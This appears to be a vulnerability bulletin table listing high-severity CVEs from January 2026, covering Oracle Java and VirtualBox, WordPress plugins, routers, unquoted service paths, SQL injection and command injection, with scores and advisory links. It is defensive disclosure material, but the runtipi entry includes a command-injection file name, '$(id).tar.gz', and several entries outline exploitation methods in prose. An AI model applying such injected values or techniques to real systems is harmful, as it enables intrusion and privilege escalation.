| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: AWT, JavaFX). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.4 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N). | 2026-01-20 | 7.4 | CVE-2026-21932 | Oracle Advisory |
| Oracle Corporation--Oracle Java SE | Vulnerability in the Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Security). Supported versions that are affected are Oracle Java SE: 8u471, 8u471-b50, 8u471-perf, 11.0.29, 17.0.17, 21.0.9, 25.0.1; Oracle GraalVM for JDK: 17.0.17 and 21.0.9; Oracle GraalVM Enterprise Edition: 21.3.16. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM for JDK, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 7.5 | CVE-2026-21945 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21955 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21956 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21987 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21988 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle VM VirtualBox accessible data as well as unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:L). | 2026-01-20 | 8.1 | CVE-2026-21989 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 8.2 | CVE-2026-21990 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21957 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows unauthenticated attacker with access to the physical communication segment attached to the hardware where the Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21982 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21983 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H). | 2026-01-20 | 7.5 | CVE-2026-21984 | Oracle Advisory |
| Oracle Corporation--Oracle VM VirtualBox | Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.14 and 7.2.4. Easily exploitable vulnerability allows unauthenticated attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. Note: This vulnerability applies to Windows VMs only. CVSS 3.1 Base Score 7.1 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H). | 2026-01-20 | 7.1 | CVE-2026-21986 | Oracle Advisory |
| Oracle Corporation--Siebel CRM Deployment | Vulnerability in the Siebel CRM Deployment product of Oracle Siebel CRM (component: Server Infrastructure). Supported versions that are affected are 17.0-25.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via TLS to compromise Siebel CRM Deployment. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Siebel CRM Deployment. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). | 2026-01-20 | 7.5 | CVE-2026-21926 | Oracle Advisory |
| OSAS--OSAS Traverse Extension | OSAS Traverse Extension 11 contains an unquoted service path vulnerability in the TravExtensionHostSvc service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject and execute malicious code by placing executable files in the service's path, potentially gaining elevated system access. | 2026-01-21 | 7.8 | CVE-2021-47864 | ExploitDB-49698 Archived Vendor Homepage VulnCheck Advisory: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path |
| pbatard--rufus | Rufus is a utility that helps format and create bootable USB flash drives. Versions 4.11 and below contain a race condition (TOCTOU) in src/net.c during the creation, validation, and execution of the Fido PowerShell script. Since Rufus runs with elevated privileges (Administrator) but writes the script to the %TEMP% directory (writeable by standard users) without locking the file, a local attacker can replace the legitimate script with a malicious one between the file write operation and the execution step. This allows arbitrary code execution with Administrator privileges. This issue has been fixed in version 4.12_BETA. | 2026-01-22 | 7.3 | CVE-2026-23988 | https://github.com/pbatard/rufus/security/advisories/GHSA-hcx5-hrhj-xhq9 https://github.com/pbatard/rufus/commit/460cc5768aa45be07941b9e4ebc9bee02d282873 https://github.com/pbatard/rufus/releases/tag/v4.12_BETA |
| PDF Complete, Inc.--PDFCOMPLETE Corporate Edition | PDF Complete Corporate Edition 4.1.45 contains an unquoted service path vulnerability in the pdfcDispatcher service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in the service binary location to inject malicious executables that will be run with elevated LocalSystem privileges. | 2026-01-23 | 7.8 | CVE-2021-47896 | ExploitDB-49558 Vendor Homepage Software Download Page VulnCheck Advisory: PDFCOMPLETE Corporate Edition 4.1.45 - 'pdfcDispatcher' Unquoted Service Path |
| PEEL eCommerce--PEEL Shopping | PEEL Shopping 9.3.0 contains a stored cross-site scripting vulnerability in the 'Comments / Special Instructions' parameter of the purchase page. Attackers can inject malicious JavaScript payloads that will execute when the page is refreshed, potentially allowing client-side script execution. | 2026-01-23 | 7.2 | CVE-2021-47892 | ExploitDB-49574 Archived Vendor Homepage VulnCheck Advisory: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting |
| PEEL eCommerce--PEEL Shopping | PEEL Shopping 9.3.0 contains a stored cross-site scripting vulnerability in the address parameter of the change_params.php script. Attackers can inject malicious JavaScript payloads that execute when users interact with the address text box, potentially enabling client-side script execution. | 2026-01-23 | 7.2 | CVE-2021-47897 | ExploitDB-49553 Archived Vendor Homepage VulnCheck Advisory: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting |
| PHPGurukul--Directory Management System | A security vulnerability has been detected in PHPGurukul Directory Management System 1.0. An unknown function of the file /index.php in the Search component is affected. Manipulation of the searchdata argument leads to SQL injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be used. | 2026-01-19 | 7.3 | CVE-2026-1160 | VDB-341754; PHPGurukul Directory Management System Search index.php sql injection VDB-341754; CTI Indicators (IOB, IOC, TTP, IOA); Submit #736333; itsourcecode Directory Management System V1.0 SQL Injection https://github.com/YouSeeYouOneDayDayDe/Nick_1321_vuls/issues/2 https://phpgurukul.com/ |
| phppgadmin--phpPgAdmin | phpPgAdmin 7.13.0 contains a remote command execution vulnerability that allows authenticated attackers to execute arbitrary system commands through SQL query manipulation. Attackers can create a custom table, upload a malicious .txt file, and use the COPY FROM PROGRAM command to execute operating system commands with the application's privileges. | 2026-01-21 | 8.8 | CVE-2021-47853 | ExploitDB-49736 phpPgAdmin Official Release Page VulnCheck Advisory: phpPgAdmin 7.13.0 - COPY FROM PROGRAM Command Execution |
| Phreesoft--PhreeBooks | PhreeBooks 5.2.3 contains an authenticated file upload vulnerability in the Image Manager that allows remote code execution. Attackers can upload a malicious PHP web shell by exploiting unrestricted file type uploads to gain command execution on the server. | 2026-01-23 | 8.8 | CVE-2021-47904 | ExploitDB-49524 Official Vendor Homepage ExploitDB-46645 Web Shell Payload Gist VulnCheck Advisory: PhreeBooks 5.2.3 - Remote Code Execution |
| posimyththemes--Nexter Extension Site Enhancements Toolkit | The Nexter Extension - Site Enhancements Toolkit plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 4.4.6 via deserialization of untrusted input in the 'nxt_unserialize_replace' function. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present. | 2026-01-20 | 8.1 | CVE-2026-0726 | https://www.wordfence.com/threat-intel/vulnerabilities/id/02de9287-68e4-46ce-a491-3f6cbb7fc0ed?source=cve https://plugins.trac.wordpress.org/changeset?old_path=/nexter-extension/tags/4.4.6/include/panel-settings/extensions/nexter-ext-replace-url.php&new_path=/nexter-extension/tags/4.4.7/include/panel-settings/extensions/nexter-ext-replace-url.php |
| ProFTPD--ProFTPD | ProFTPD 1.3.7a contains a denial of service vulnerability that allows attackers to overwhelm the server by creating multiple simultaneous FTP connections. Attackers can repeatedly establish connections using threading to exhaust server connection limits and block legitimate user access. | 2026-01-21 | 7.5 | CVE-2021-47865 | ExploitDB-49697 ProFTPD Official Website ProFTPD GitHub Repository VulnCheck Advisory: ProFTPD 1.3.7a - Remote Denial of Service |
| pypa--wheel | wheel is a command line tool for manipulating Python wheel files, as defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack function is vulnerable to file permission modification through mishandling of file permissions after extraction. The logic blindly trusts the filename from the archive header for the chmod operation, even though the extraction process itself might have sanitized the path. Attackers can craft a malicious wheel file that, when unpacked, changes the permissions of critical system files (e.g., /etc/passwd, SSH keys, config files), allowing for Privilege Escalation or arbitrary code execution by modifying now-writable scripts. This issue has been fixed in version 0.46.2. | 2026-01-22 | 7.1 | CVE-2026-24049 | https://github.com/pypa/wheel/security/advisories/GHSA-8rrh-rw8j-w5fx https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef https://github.com/pypa/wheel/releases/tag/0.46.2 |
| Quenary--tugtainer | Tugtainer is a self-hosted app for automating updates of Docker containers. In versions prior to 1.16.1, the password authentication mechanism transmits passwords via URL query parameters instead of the HTTP request body. This causes passwords to be logged in server access logs and potentially exposed through browser history, Referer headers, and proxy logs. Version 1.16.1 patches the issue. | 2026-01-19 | 8.1 | CVE-2026-23846 | https://github.com/Quenary/tugtainer/security/advisories/GHSA-f2qf-f544-xm4p https://github.com/Quenary/tugtainer/commit/9d23bf40ac1d39005582abfcf0a84753a4e29d52 |
| Realtek Semiconductor Corp.--Realtek Wireless LAN Utility | Realtek Wireless LAN Utility 700.1631 contains an unquoted service path vulnerability that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted service path by inserting malicious code in the system root path that would execute during application startup or system reboot. | 2026-01-21 | 7.8 | CVE-2021-47880 | ExploitDB-49646 Realtek Official Homepage VulnCheck Advisory: Realtek Wireless LAN Utility 700.1631 - 'Realtek11nSU' Unquoted Service Path |
| Rockstar Games--Rockstar Games Launcher | Rockstar Games Launcher 1.0.37.349 contains a privilege escalation vulnerability that allows authenticated users to modify the service executable with weak permissions. Attackers can replace the RockstarService.exe with a malicious binary to create a new administrator user and gain elevated system access. | 2026-01-21 | 8.8 | CVE-2021-47852 | ExploitDB-49739 Rockstar Games Launcher Official Site VulnCheck Advisory: Rockstar Service - Insecure File Permissions |
| runtipi--runtipi | Runtipi is a Docker-based, personal homeserver orchestrator that facilitates multiple services on a single server. Versions 3.7.0 and above allow an authenticated user to execute arbitrary system commands on the host server by injecting shell metacharacters into backup filenames. The BackupManager fails to sanitize the filenames of uploaded backups. The system persists user-uploaded files directly to the host filesystem using the raw originalname provided in the request. This allows an attacker to stage a file containing shell metacharacters (e.g., $(id).tar.gz) at a predictable path, which is later referenced during the restore process. The successful storage of the file is what allows the subsequent restore command to reference and execute it. This issue has been fixed in version 4.7.0. | 2026-01-22 | 8.1 | CVE-2026-24129 | https://github.com/runtipi/runtipi/security/advisories/GHSA-vrgf-rcj5-6gv9 https://github.com/runtipi/runtipi/commit/c3aa948885554a370d374692158a3bfe1cfdc85a https://github.com/runtipi/runtipi/releases/tag/v4.7.0 |
| Sandboxie-Plus--Sandboxie Plus | Sandboxie Plus 0.7.2 contains an unquoted service path vulnerability in the SbieSvc service that allows local attackers to execute code with elevated privileges. Attackers can exploit the unquoted binary path to inject malicious executables that will be launched with LocalSystem permissions during service startup. | 2026-01-21 | 7.8 | CVE-2021-47883 | ExploitDB-49631 Vendor Homepage VulnCheck Advisory: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path |
| Sangfor--Operation and Maintenance Management System | A vulnerability was identified in Sangfor Operation and Maintenance Management System up to 3.0.12. Affected by this issue is the function SessionController of the file /isomp-protocol/protocol/session of the component SSH Protocol Handler. The manipulation of the argument keypassword leads to os command injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-22 | 8.8 | CVE-2026-1324 | VDB-342300 \| Sangfor Operation and Maintenance Management System SSH Protocol session SessionController os command injection VDB-342300 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #735716 \| Sangfor Operation and Maintenance Management System (OSM / 运维安全管理系统) 3.0.8 OS Command Injection https://github.com/LX-LX88/cve/issues/20 |
| satndy--Aplikasi-Biro-Travel | Blitar Tourism 1.0 contains an authentication bypass vulnerability that allows attackers to bypass login by injecting SQL code through the username parameter. Attackers can manipulate the login request by sending a crafted username with SQL injection techniques to gain unauthorized administrative access. | 2026-01-21 | 8.2 | CVE-2021-47848 | ExploitDB-49759 Aplikasi Biro Travel GitHub Repository VulnCheck Advisory: Blitar Tourism 1.0 - Authentication Bypass SQLi |
| Security--Winpakpro | WIN-PACK PRO 4.8 contains an unquoted service path vulnerability in the ScheduleService that allows local users to potentially execute code with elevated system privileges. Attackers can exploit the unquoted path in 'C:\Program Files <x86>\WINPAKPRO\ScheduleService Service.exe' to inject malicious code that would execute during service startup. | 2026-01-21 | 7.8 | CVE-2021-47867 | ExploitDB-49691 Honeywell Product Webpage VulnCheck Advisory: WIN-PACK PRO 4.8 - 'ScheduleService' Unquoted Service Path |
| SEO Panel--SEO Panel | SEO Panel versions prior to 4.9.0 contain a blind SQL injection vulnerability in the archive.php page that allows authenticated attackers to manipulate database queries through the 'order_col' parameter. Attackers can use sqlmap to exploit the vulnerability and extract database information by injecting malicious SQL code into the order column parameter. | 2026-01-21 | 7.1 | CVE-2021-47872 | ExploitDB-49666 Official SEO Panel Homepage SEO Panel 4.9.0 Release GitHub Issue #209 VulnCheck Advisory: SEO Panel < 4.9.0 - 'order_col' Blind SQL Injection |
| shazdeh--Administrative Shortcodes | The Administrative Shortcodes plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 0.3.4 via the 'slug' attribute of the 'get_template' shortcode. This is due to insufficient path validation on user-supplied input passed to the get_template_part() function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2026-01-24 | 7.5 | CVE-2026-1257 | https://www.wordfence.com/threat-intel/vulnerabilities/id/119fe499-88c4-413f-a44a-2b3acfdbdeb5?source=cve https://plugins.trac.wordpress.org/browser/administrative-shortcodes/trunk/administrative-shortcodes.php#L144 https://wordpress.org/plugins/administrative-shortcodes https://plugins.trac.wordpress.org/browser/administrative-shortcodes/tags/0.3.4/administrative-shortcodes.php#L144 |
| Shenzhen Tenda Technology Co.,Ltd.--Tenda D151 & D301 | Tenda D151 and D301 routers contain an unauthenticated configuration download vulnerability that allows remote attackers to retrieve router configuration files. Attackers can send a request to /goform/getimage endpoint to download configuration data including admin credentials without authentication. | 2026-01-21 | 7.5 | CVE-2021-47802 | ExploitDB-49782 Tenda Official Vendor Homepage VulnCheck Advisory: Tenda D151 & D301 - Configuration Download |
| sibercii6-crypto--teklifolustur_app | teklifolustur_app is a web-based PHP application that allows users to create, manage, and track quotes for their clients. Prior to commit dd082a134a225b8dcd401b6224eead4fb183ea1c, an Insecure Direct Object Reference (IDOR) vulnerability exists in the offer view functionality. Authenticated users can manipulate the offer_id parameter to access offers belonging to other users. The issue is caused by missing authorization checks ensuring that the requested offer belonged to the currently authenticated user. Commit dd082a134a225b8dcd401b6224eead4fb183ea1c contains a patch. | 2026-01-19 | 7.1 | CVE-2026-23843 | https://github.com/sibercii6-crypto/teklifolustur_app/security/advisories/GHSA-6h9r-mmg3-cg7m https://github.com/sibercii6-crypto/teklifolustur_app/commit/dd082a134a225b8dcd401b6224eead4fb183ea1c |
| SIPp--SIPp | A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and availability. | 2026-01-23 | 8.4 | CVE-2026-0710 | https://access.redhat.com/security/cve/CVE-2026-0710 RHBZ#2427788 |
| Softros Systems--LAN Messenger | Softros LAN Messenger 9.6.4 contains an unquoted service path vulnerability in the SoftrosSpellChecker service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted path in 'C:\Program Files (x86)\Softros Systems\Softros Messenger\Spell Checker\' to inject malicious executables and escalate privileges. | 2026-01-23 | 7.8 | CVE-2021-47889 | ExploitDB-49588 Vendor Homepage VulnCheck Advisory: Softros LAN Messenger 9.6.4 - 'SoftrosSpellChecker' Unquoted Service Path |
| Softros Systems--LogonExpert | LogonExpert 8.1 contains an unquoted service path vulnerability in the LogonExpertSvc service running with LocalSystem privileges. Attackers can exploit the unquoted path to place malicious executables in intermediate directories, potentially gaining elevated system access during service startup. | 2026-01-23 | 7.8 | CVE-2021-47890 | ExploitDB-49586 Vendor Homepage Software Download Link VulnCheck Advisory: LogonExpert 8.1 - 'LogonExpertSvc' Unquoted Service Path |
| Solvera Software Services Trade Inc.--Teknoera | Unrestricted Upload of File with Dangerous Type vulnerability in Solvera Software Services Trade Inc. Teknoera allows File Content Injection. This issue affects Teknoera: through 01102025. | 2026-01-22 | 8.1 | CVE-2025-10856 | https://www.usom.gov.tr/bildirim/tr-26-0003 |
| Solvera Software Services Trade Inc.--Teknoera | Authorization Bypass Through User-Controlled Key vulnerability in Solvera Software Services Trade Inc. Teknoera allows Exploitation of Trusted Identifiers. This issue affects Teknoera: through 01102025. | 2026-01-22 | 7.5 | CVE-2025-10855 | https://www.usom.gov.tr/bildirim/tr-26-0003 |
| specialk--User Submitted Posts Enable Users to Submit Posts from the Front End | The User Submitted Posts - Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom fields in all versions up to, and including, 20251210 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-24 | 7.2 | CVE-2026-0800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1ec907bc-bd10-4dc5-be35-4f2aaf5ef444?source=cve https://plugins.trac.wordpress.org/changeset/3436859/user-submitted-posts |
| Tenda--AX1803 | A flaw has been found in Tenda AX1803 1.0.0.1. The affected element is the function fromGetWifiGuestBasic of the file /goform/WifiGuestSet. Executing a manipulation of the argument guestWrlPwd/guestEn/guestSsid/hideSsid/guestSecurity can lead to stack-based buffer overflow. The attack may be launched remotely. The exploit has been published and may be used. | 2026-01-22 | 8.8 | CVE-2026-1329 | VDB-342305 \| Tenda AX1803 WifiGuestSet fromGetWifiGuestBasic stack-based overflow VDB-342305 \| CTI Indicators (IOB, IOC, IOA) Submit #736063 \| Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow Submit #736064 \| Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736065 \| Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736066 \| Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) Submit #736067 \| Tenda AX1803 V1.0.0.1 Stack-based Buffer Overflow (Duplicate) https://river-brow-763.notion.site/Tenda-AX1803-Buffer-Overflow-in-fromGetWifiGusetBasic-2e3a595a7aef80a78225db34317daa40#2e3a595a7aef801ab517e4af5631227a https://www.tenda.com.cn/ |
| The Textpattern Development Team--Textpattern | Textpattern versions prior to 4.8.3 contain an authenticated remote code execution vulnerability that allows logged-in users to upload malicious PHP files. Attackers can upload a PHP file with a shell command execution payload and execute arbitrary commands by accessing the uploaded file through a specific URL parameter. | 2026-01-23 | 8.8 | CVE-2021-47888 | ExploitDB-49620 Official Vendor Homepage Textpattern Software Download Page VulnCheck Advisory: Textpattern 4.8.3 - Remote code execution |
| Tosei--Online Store Management System | A vulnerability was determined in Tosei Online Store Management System ネット店舗管理システム 1.01. The affected element is an unknown function of the file /cgi-bin/imode_alldata.php. Executing a manipulation of the argument DevId can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-01-19 | 7.3 | CVE-2026-1192 | VDB-341777 \| Tosei Online Store Management System ネット店舗管理システム imode_alldata.php command injection VDB-341777 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #734205 \| Tosei Tosei Online Store Management System ネット店舗管理システム 1.01 Command Injection https://www.yuque.com/yuqueyonghuexlgkz/zepczx/keenhf9u2bnw5o6g |
| TOTOLINK--A3700R | A weakness has been identified in TOTOLINK A3700R 9.1.2u.5822_B20200513. This affects the function setWiFiEasyGuestCfg of the file /cgi-bin/cstecgi.cgi. Executing a manipulation of the argument ssid can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. | 2026-01-19 | 8.8 | CVE-2026-1143 | VDB-341735 \| TOTOLINK A3700R cstecgi.cgi setWiFiEasyGuestCfg buffer overflow VDB-341735 \| CTI Indicators (IOB, IOC, IOA) Submit #735502 \| TOTOLINK A3700R V9.1.2u.5822_B20200513 Buffer Overflow https://lavender-bicycle-a5a.notion.site/TOTOLINK-A3700R-setWiFiEasyGuestCfg-2e353a41781f8057a244ead07d5eaaff?source=copy_link https://www.totolink.net/ |
